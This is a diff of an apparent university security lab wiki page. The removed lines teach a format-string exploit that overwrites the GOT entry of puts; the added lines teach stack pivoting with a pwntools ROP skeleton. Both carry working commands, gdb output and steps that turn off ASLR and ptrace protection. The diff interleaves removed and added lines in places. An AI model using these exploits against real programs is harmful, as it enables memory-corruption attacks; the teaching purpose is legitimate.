-$ ./basic_format_string +gdb-peda$ x/100g 0x00404000
-aaaa +0x404000:​ 0x0000000000403e20 0x00007ffff7ffe170 
-%llx%llx%llx%llx%llx +0x404010:​ 0x00007ffff7dec680 0x0000000000401036 
-f76f65a0ffd559a0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25f75718700000000a+0x404020:​ 0x0000000000401046 0x0000000000401056 
 +0x404030:​ 0x0000000000401066 0x0000000000401076 
 +0x404040:​ 0x0000000000401086 0x0000000000000000 
 +0x404050:​ 0x0000000000000000 0x0000000000000000 
 +0x404060 <​stdout@@GLIBC_2.2.5>:​ 0x00007ffff7dd0760 0x0000000000000000
  
-$ ./basic_format_string +gdb-peda$ x/100g 0x00404400
-aaaa +0x404400:​ 0x0000000000000000 0x0000000000000000 
-%llx%llx%llx%llx%llx%llx +0x404410:​ 0x0000000000000000 0x0000000000000000 
-f76fa5a0ffc4e5c0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25f757000a786c6c25616161610804856b+0x404420:​ 0x0000000000000000 0x0000000000000000 
 +0x404430:​ 0x0000000000000000 0x0000000000000000 
 +0x404440:​ 0x0000000000000000 0x0000000000000000 
 +0x404450:​ 0x0000000000000000 0x0000000000000000 
 +0x404460:​ 0x0000000000000000 0x0000000000000000
  
-$ ./​basic_format_string ​ 
-aaaa 
-%llx%llx%llx%llx%llx%lx 
-f77115a0ffa03f30786c6c25080484a2786c6c25786c6c25786c6c25786c6c25f758c8000a786c25804856b 
- 
-$ ./​basic_format_string ​ 
-aaaa 
-%llx%llx%llx%llx%llx%lx%lx 
-f77535a0fffef1d0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25a786c25786c25804856b61616161 
 </​code>​ </​code>​
  
-In the last run we get the ''61616161'' representation of ''aaaa''. That means that, if we replace the final ''%lx'' with ''%n'', we will write the address ''0x61616161'' the number of characters processed so far: +Besides the values at the start of the region not being zero, there is also the risk of the stack pointer moving below the start of the region, where there is no write permission.
-<​code>​ +
-$ echo -n '​f77535a0fffef1d0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25a786c25786c25804856b'​ | wc -c +
-84 +
-</​code>​+
  
-We need that number to be ''​100''​. You can fine tune the format string by using a construct such as ''​%32llx''​ to print a number on ''​32''​ characters instead of a maximum of ''​16''​ characters. See how much extra room you need and see if you reach ''​100''​ bytes.+=== Tutorial: First stage payload ​ ===
  
-<note important> +We need to find a sequence of instructions akin to:
-The construct needn'​t use multiple ​of ''​8''​ for length. You may use the ''​%32llx''​ or ''​%33llx''​ or ''​%42llx''​. The numeric argument states the length of the print output. +
-</​note>​ +
- +
-After the plan is complete, write down the attack by filling the ''​TODO''​ lines in the ''​exploit.py''​ solution skeleton. +
-==== [3p] Extra: Format String Attack ====+
  
-The goal of this task is to call ''my_evil_func'' again. This task is also tutorial based. +<code asm>
-<code C> +call read
-int +leave 
-main(int argc, char *argv[]) +ret
-+
- printf(argv[1]);​ +
- printf("​\nThis is the most useless and insecure program!\n"​);​ +
- return 0; +
-}+
 </​code>​ </​code>​
  
-=== Transform Format String Attack to a Memory Write ===+If we look around in the disassembled functions, we notice that ''​play''​ has just what we need at the end:
  
-Any string that represents a useful format (e.g. ''%d'', ''%x'' etc.) can be used to discover the vulnerability. +<code asm>
-<code bash> +   0x00000000004012ae <+49>: call   0x401050 <read@plt>
-$ ./format "%08x %08x %08x %08x" +   0x00000000004012b3 <​+54>:​ leave  ​ 
-00000000 f759d4d3 00000002 ffd59bd4 +   0x00000000004012b4 <​+55>:​ ret ​
-This is the most useless and insecure program!+
 </​code>​ </​code>​
  
-The values starting with 0xf are very likely pointers. Again, we can use this vulnerability as an information leak. But we want more.+We will use this sequence to pivot the stack.
  
-Another useful format for us is ''%m$'' followed by any normal format selector. This means that the ''m''th parameter is used as the input for the following format. ''%10$08x'' will print the ''10''th parameter with ''%08x''. This allows us to access the stack precisely.+Our payload must do a call to ''read(0, pivot, size);'', so the stack and the registers should look as follows when reaching ''ret'':
  
-Example: +<​code>​ 
-<code bash> +[RSP-8]  <pivot-8>       # Overwrite RBP
-$ ./​format ​"%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x+[RSP]    <call read> 
-00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24 +[RDI]  0x0             # stdin 
-This is the most useless and insecure program!+[RSI]  <​pivot> ​        # ​"buffer
 +[RDX] 0x200           # size
 </​code>​ </​code>​
-Note the equivalence between formats. 
  
-Now, because we are able to select //any// higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer. +<note important>You might not find a ''pop rdx'' gadget in the binary, but luckily the ''rdx'' register is not changed after the ''read'' call in the main program, so it should already hold a large enough value. </note>
-<code bash> +
-$ ./format "​$(perl -e 'printf "​%%08x\x0a"​x10000')"  +
-</code>+
  
-Depending on your setup you should ​be able to view the hex representation of the string "​%08x\n"​.+With all the pieces in place, we should ​have a working pivoting payload:
  
-**Why do we need our own buffer?** Remember the ''​%n''​ format? It can be used to write at an address given as parameter. The idea is to give this address as parameter and achieve memory writing. We will see later how to control the value.+<code python>​ 
 +#​!/​usr/​bin/​env python 
 +from pwn import ​*
  
-The next steps are done with ASLR disabled. In order to disable ASLR, please run: +io = process('./task1')
-<code bash> + 
-echo 0 | sudo tee /​proc/​sys/​kernel/​randomize_va_space +# Useful values 
-</​code>​+ret_offset = 56 
 +call_read = 0x401050 
 +pivot = 0x404000
  
-By trial and error or by using GDB (breakpoint on ''​printf''​) we can determine 
-<code bash> 
-$ ./format "​$(perl -e '​printf "​A"​x512 . "​%%08x ​  ​\x0a"​x200'​)" ​ | grep -n 41 | head 
-17:​415729ac ​   
-56:​ffffdd41 ​   
-128:​41007461 ​   
-129:​41414141 ​   
-130:​41414141 ​ 
-</​code>​ 
  
-<​note>​ +# Construct payloads
-Command line Perl/Python exploits tend to get very tedious and hard to read when the payload gets more complex. You can use the following reference Perl script to write your exploit. The code is equivalent to the above one-liner.+
  
-<code perl> +payload1 = '​A'​*(ret_offset - 8) 
-#!/​usr/​bin/​env perl+payload1 += p64(pivot-8) 
 +payload1 += TODO  ​#pop rdi; ret 
 +payload1 += p64(0) 
 +payload1 += TODO  #pop rsi; ret 
 +payload1 += p64(pivot) 
 +payload1 += TODO  #pop rdx; ret 
 +payload1 += p64(100)
  
-use strict; +payload1 += p64(call_read) 
-use warnings; +payload1 += p64(0x4012b3)  # leave; ret (runs after read returns)
-use v5.20;+
  
-my $stack_items = 1000;+log.info(io.recvline()) 
 +log.info(io.recvline()) 
 +gdb.attach(io) 
 +raw_input("​Send payload?"​) 
 +io.sendline(payload1)
  
-printf "​A"​ x 512; +io.interactive()
-printf "​%%08x ​  ​\x0a"​ x $stack_items;​+
 </​code>​ </​code>​
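The ''p64'' helper used in the script above comes from pwntools and, with its default settings, packs an integer as 8 little-endian bytes. As a rough illustration, the same packing can be reproduced with the standard ''struct'' module. The helper name ''pack64'' is made up for this sketch; the offset and the pivot address are the ones from the skeleton.

```python
import struct

def pack64(value):
    # Pack an integer as 8 little-endian bytes (a stand-in for pwntools' p64).
    return struct.pack("<Q", value)

ret_offset = 56      # offset of the saved return address, taken from the skeleton
pivot = 0x404000     # pivot address, taken from the skeleton

# Padding up to the saved RBP slot, then the fake RBP value (pivot - 8).
prefix = b"A" * (ret_offset - 8) + pack64(pivot - 8)

print(prefix[-8:].hex())   # the 8 bytes that overwrite the saved RBP
print(len(prefix))         # the ROP chain itself starts at this offset
```

The chain of gadgets and arguments is then appended to ''prefix'' one packed quadword at a time.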
  
-Then call the ''​format''​ using (note the enclosing double-quotes):+In order to see pivoting in action, do the following:
  
 <​code>​ <​code>​
-./format "​$(perl exploit.pl)"+./test.py 
 +[+] Starting local process '​./​task1':​ Done 
 +[*] Welcome to our Retired Old Programmers message board! 
 +[*] Please leave a message:  
 +[*] running in new terminal: gdb -q  "/​task1" ​4770 
 +[+] Waiting for debugger: Done 
 +Send payload? ​
 </​code>​ </​code>​
-</​note>​ 
  
-One idea is to keep things in multiples of 4, like I did for "%08x   \x0a". If you are looking at line ''128'', one of our ''A''s is there. Because the machine is little endian, the 0x41 appears as the most significant byte. We want to fix this, to have our buffer aligned. Note that you can add as many format strings as you want; the start of the buffer will be the same (more or less). +This will spawn a new ''gdb-peda'' window. Set a breakpoint at the ''ret'' instruction of ''play'' (''0x4012b4'' in the disassembly above), then ''continue''. In the other window (the one waiting for you to answer ''Send payload?''), hit ''Enter''. You will notice gdb hits the breakpoint and now you can single step (via ''ni'').
  
-We can compress our buffer by specifying the position of the argument. +<note important>
-<code bash> +There is a known issue on the lab stations when running GDB/PEDA from ''pwntools'', described at [[http://askubuntu.com/questions/41629/after-upgrade-gdb-wont-attach-to-process|this link]]. Run the command below to work around it:
-$ ./format "​$(perl -e '​printf "​BCDE"​."​A"​x510 . "​%%126\$08x"'​)"​ +
-BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45444342 +
-This is the most useless and insecure program! +
-</code> +
-You can see that the last information is our "​BCDE"​ string printed with ''​%08x''​ this means that we know where'​s our buffer. +
- +
-<note tip> +
-You need to enable core dumps in order to reproduce ​the steps below:+
 <​code>​ <​code>​
-$ ulimit -c unlimited+echo 0 | sudo tee /​proc/​sys/​kernel/​yama/​ptrace_scope
 </​code>​ </​code>​
 </​note>​ </​note>​
  
-<note> +Once you reach ''call read'', gdb will block. In the pwntools interactive window, give an input such as ''AAAAAAAA'' to complete the read call and unblock gdb. Continue stepping until you reach the ''leave'' instruction. Notice how ''rsp'' ends up pointing into the pivot area: ''leave'' copies ''rbp'' into ''rsp'' and then pops ''rbp'', so ''rsp'' becomes the old ''rbp+8''. The following ''ret'' instruction will pop its return address from the pivot address, at which you will find your ''AAAAAAAA''.
-The steps below work on a given version of libc and a given system. That is why the instruction that causes the fault is<code> +
-mov %edx,​(%eax) +
-</​code>​ +
-or the equivalent in Intel syntax<​code>​ +
-mov DWORD PTR [eax], edx +
-</​code>​ +
-It may be different on your system, for example ''edx'' may be replaced by ''esi'', such as<code> +
-mov DWORD PTR [eax], esi +
-</​code>​ +
-Update the explanations below accordingly. +
-</​note>​+
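As a rough mental model of the pivot, ''leave'' behaves like ''mov rsp, rbp'' followed by ''pop rbp'', and ''ret'' pops the next quadword into ''rip''. The sketch below simulates only that, with a dictionary standing in for memory. The initial ''rsp'' value and the quadword stored at ''pivot - 8'' are made-up placeholders; the pivot address and the ''leave'' address are the ones used in this tutorial.

```python
def leave_ret(regs, mem):
    # leave: mov rsp, rbp ; pop rbp
    regs["rsp"] = regs["rbp"]
    regs["rbp"] = mem[regs["rsp"]]
    regs["rsp"] += 8
    # ret: pop rip
    regs["rip"] = mem[regs["rsp"]]
    regs["rsp"] += 8
    return regs

PIVOT = 0x404000
mem = {
    PIVOT - 8: 0xdeadbeef,          # placeholder: whatever happens to sit below the pivot
    PIVOT: 0x4141414141414141,      # the "AAAAAAAA" written by read(0, pivot, size)
}
# State just before 'leave': RBP was overwritten with pivot - 8 by the first payload.
regs = leave_ret({"rbp": PIVOT - 8, "rsp": 0x7ffd00000000, "rip": 0x4012b3}, mem)

print({name: hex(value) for name, value in regs.items()})
```

After the two instructions, ''rip'' holds the first quadword of the second stage and ''rsp'' points right after it, which is why the second-stage chain is written starting at the pivot address.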
  
-<​note>​ +=== Second stage payload ​ ===
-Remove any core files you may have generated before testing your program:<​code>​ +
-rm -f core +
-</​code>​ +
-</​note>​+
  
-We can replace ''%08x'' with ''%n''; this should lead to a segmentation fault. +Now you are set to write a fully working ROP chain that sequentially calls the three functions needed to open, read and print the contents of the flag file.
-<code bash> +
-$ ./format "​$(perl -e '​printf "​BCDE"​."​A"​x510 . "​%%126\$08n"'​)"​ +
-Segmentation fault (core dumped) +
-$ gdb ./format -c core +
-... +
-Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'​. +
-Program terminated with signal 11, Segmentation fault. +
-#0  0xf7e580a2 in vfprintf () from /​lib/​i386-linux-gnu/​libc.so.6 +
-(gdb) bt +
-#0  0xf7e580a2 in vfprintf () from /​lib/​i386-linux-gnu/​libc.so.6 +
-#1  0xf7e5deff in printf () from /​lib/​i386-linux-gnu/​libc.so.6 +
-#2  0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:​18 +
-(gdb) x/i $eip +
-=> 0xf7e580a2 <​vfprintf+17906>:​ mov ​   %edx,​(%eax) +
-(gdb) info registers $edx $eax +
-edx            0x202 514 +
-eax            0x45444342 1162101570 +
-(gdb) quit +
-</​code>​ +
-Bingo. We have memory write. The vulnerable code tried to write at the address ''0x45444342'' ("BCDE" little endian) the value 514. The value 514 is the amount of data written so far by ''printf'' (510 ''A''s and "BCDE").+
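The two register values in the core dump can be double-checked quickly. The snippet below is only a sanity check of the arithmetic, using the input from the run above.

```python
prefix = b"BCDE" + b"A" * 510

# The first four bytes of the buffer, read as a little-endian 32-bit pointer.
address = int.from_bytes(prefix[:4], "little")

# %n stores the number of characters printed so far.
written = len(prefix)

print(hex(address), hex(written))
```

These correspond to the ''eax'' (destination address) and ''edx'' (value) registers shown by gdb.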
  
-Right now, our input string has 518 bytes. But we can further compress it, thus making the value that we write independent of the length of the input. +===== Resources ​=====
- +
-<code bash> +
-$ ./format "​$(perl -e '​printf "​BCDE"​. "​A"​x506 . "​%%99x"​ . "​%%126\$08n"'​)"​ +
-Segmentation fault (core dumped) +
-$ gdb ./format -c core +
-(gdb) info registers $edx $eax +
-edx            0x261 609 +
-eax            0x45444342 1162101570 +
-(gdb) quit +
-</​code>​ +
-Here we managed to write 609 (4+506+99). Note we should keep the number of bytes before the format string the same. Which means that if we want to print with a padding of 100 (three digits) we should remove one ''​A''​. You can try this by yourself. +
- +
-**How far can we go?** Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with ''​snprintf''​. 255 should be enough. +
- +
-Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write 4 bytes at a time we can make use of the endianness of the machine. **The idea** is to write at the address n and then at the address n+1 and so on. +
- +
-Let's first display the address. We are using the address ''0x804a008''. This is the address of the GOT entry for the ''puts'' function. Basically, we will overwrite the GOT entry for ''puts''. +
- +
-<code bash> +
-$ objdump -R ./format | grep puts +
-0804a008 R_386_JUMP_SLOT ​  ​puts +
-$ ./format "​$(perl -e '​printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%255x|"​ . "​%%126\$08x"​ . "​%%255x|"​ . "​%%127\$08x"​ . "​%%255x|"​ . "​%%128\$08x"'​)"​ +
- +
- +
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... +
-0|0804a008 +
-f7e2a4d3|0804a009 +
-2|0804a00a +
-ffffd2c4|0804a00b +
-                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            This is the most useless and insecure program! +
- +
-</​code>​ +
-Why are we printing 498 ''​A''​s?​ We added 12 bytes before our format and 6 extra bytes for the output -- the ''​|''​ is there only for pretty print. We want to keep in place the first argument -- anyway, you should always check this. +
- +
-Let's replace the ''%x'' with ''%n'': +
-<code bash> +
-$ ./format "​$(perl -e '​printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%255x|"​ . "​%%126\$08n"​ . "​%%255x|"​ . "​%%127\$08n"​ . "​%%255x|"​ . "​%%128\$08n"​ . "​%%255x|"​ . "​%%129\$08n"'​)"​ +
-$ gdb ./format -c core +
-Program terminated with signal 11, Segmentation fault. +
-#0  0x02020202 in ?? () +
-(gdb) x/x 0x0804a000 +
-0x804a000 <​printf@got.plt>:​ 0xf7e5ded0 +
-(gdb) x/x 0x0804a004 +
-0x804a004 <​fwrite@got.plt>:​ 0x08048396 +
-(gdb) x/x 0x0804a008 +
-0x804a008 <​puts@got.plt>:​ 0x02020202 +
-(gdb) x/x 0x0804a00c +
-0x804a00c <​__gmon_start__@got.plt>:​ 0x08000006 +
-(gdb)  +
-</​code>​ +
- +
-In the gdb session above you can see: +
-  - the got entry for printf points to a library address (the address starts with 0xf) +
-  - the got entry for fwrite points to some code inside the binary. This means that the function wasn't yet called, the loader didn't load this address yet. +
-  - the puts entry points to 0x02020202. This is the value that we wrote. +
- +
-**How come we wrote the first ''​0x02''?​** +
-Just before executing the first ''​%n''​ the vulnerable code printed 770 (4*4+498+256) bytes and hex(770) ​== 0x302. +
- +
-**How come the rest of the bytes are ''​0x02''?​** +
-After executing the first ''​%n''​ we printed another 256 bytes before each ''​%n''​ so we actually wrote 0x402, 0x502 and 0x602. You can see that the last three bytes ''​%%__gmon_start__@got.plt%%''​ are ''​0x000006''​. +
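The overlapping writes can be reproduced on a small byte array. This is a sketch that assumes each ''%n'' stores a 4-byte little-endian counter; the initial contents of the two GOT entries are placeholder values, chosen only so that the top byte of the neighbouring entry is ''0x08'', as in the session above.

```python
import struct

# Two consecutive 32-bit GOT entries: puts and __gmon_start__ (placeholder contents).
memory = bytearray(struct.pack("<II", 0x080483a6, 0x080483b6))

printed = 4 * 4 + 498          # four addresses plus the 'A' padding
for i in range(4):
    printed += 256             # each "%255x|" prints 256 characters
    # The i-th %n targets puts@got + i and stores the running count as 4 bytes.
    memory[i:i + 4] = struct.pack("<I", printed)

puts_entry, next_entry = struct.unpack("<II", memory)
print(hex(puts_entry), hex(next_entry))
```

Each write clobbers the three upper bytes left by the previous one, so only the low byte of every counter survives in the ''puts'' entry, while the last write spills three bytes into the next entry.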
- +
-We want to put the value ''​0x08048494''​. +
-<code bash>  +
-$ objdump -d ./format | grep my_evil +
-08048494 <​my_evil_func>:​ +
-</​code>​ +
-The first byte is ''​0x94''​ (little endian), recall that we were able to write ''​0x02'',​ writing ''​0x94''​ means replacing first 255 with 255-(0x102-0x94) ​== 145. +
-<code bash> +
-$ ./format "​$(perl -e '​printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%145x|"​ . "​%%126\$08n"​ . "​%%255x|"​ . "​%%127\$08n"​ . "​%%255x|"​ . "​%%128\$08n"​ . "​%%255x|"​ . "​%%129\$08n"'​)"​ +
-$ gdb ./format -c core +
-#0  0x94949494 in ?? () +
-(gdb) quit +
-</​code>​ +
-The next byte that we want to write is ''0x84'', so we need to replace the second 255 with 239. We can continue this idea until we profit. +
-<code bash> +
-$ ./format "​$(perl -e '​printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%145x|"​ . "​%%126\$08n"​ . "​%%239x|"​ . "​%%127\$08n"​ . "​%%127x|"​ . "​%%128\$08n"​ . "​%%259x|"​ . "​%%129\$08n"'​)"​ | tr -s ' ' > /dev/null +
-I'm evil, but nobody calls me :-( +
-</​code>​ +
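The paddings used above can also be derived mechanically. The helper below is a sketch under the assumptions of this example: one ''|'' separator is printed after each ''%x'', 514 characters are printed before the first format, and every width is kept at 8 or more so that ''%x'' never prints more characters than requested. The function name is made up for illustration.

```python
def n_write_paddings(target, printed, separator_len=1, min_width=8):
    """Return the %<width>x paddings so that four successive %n writes
    store the bytes of `target`, least significant byte first."""
    widths = []
    for i in range(4):
        wanted = (target >> (8 * i)) & 0xFF
        # Characters still needed so that the running count ends in `wanted`.
        width = (wanted - printed - separator_len) % 256
        if width < min_width:
            width += 256       # go one full wrap further, the low byte stays the same
        widths.append(width)
        printed += width + separator_len
    return widths

print(n_write_paddings(0x08048494, printed=4 * 4 + 498))
```

For the address of ''my_evil_func'' this yields the same four widths as the final command line: 145, 239, 127 and 259.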
- +
-**[1p] Bonus task** Can you get a shell? (Assume ASLR is disabled). +
- +
-===== Mitigation and Recommendations ===== +
- +
-  - Manage the string length carefully +
-  - Don't use ''​gets''​. With ''​gets''​ there is no way of knowing how much data was read +
-  - Use string functions with an ''n'' parameter whenever a non-constant string is involved, e.g. ''snprintf'', ''strncat''. +
-  - Make sure that the ''NUL'' byte is added; for instance, ''strncpy'' does **not** add a ''NUL'' byte when the source does not fit in the given size. +
-  - Use the ''wcs*'' functions when dealing with wide char strings. +
-  - Don't trust the user! +
- +
-===== Real life Examples ===== +
- +
-  * [[http://​xkcd.com/​1354/​|Heartbleed]] +
-  * Linux kernel through 3.9.4 [[http://​www.cvedetails.com/​cve/​CVE-2013-2851/​|CVE-2013-2851]]. The fix is [[http://​marc.info/?​l=linux-kernel&​m=137055204522556&​w=2|here]]. More details [[http://​www.intelligentexploit.com/​view-details-ascii.html?​id=16609|here]]. +
-  * Windows 7 [[http://​www.cvedetails.com/​cve/​CVE-2012-1851/​|CVE-2012-1851]]. +
-  * Pidgin off the record plugin [[http://​www.cvedetails.com/​cve/​CVE-2012-2369|CVE-2012-2369]]. The fix is [[https://​bugzilla.novell.com/​show_bug.cgi?​id=762498#​c1|here]]+
  
 +  * [[http://​neilscomputerblog.blogspot.ro/​2012/​06/​stack-pivoting.html|More about stack pivoting and creating a "fake stack"​]]
cns/labs/lab-09.1512400614.txt.gz · Last modified: 2017/12/04 17:16 by razvan.deaconescu
CC Attribution-Share Alike 3.0 Unported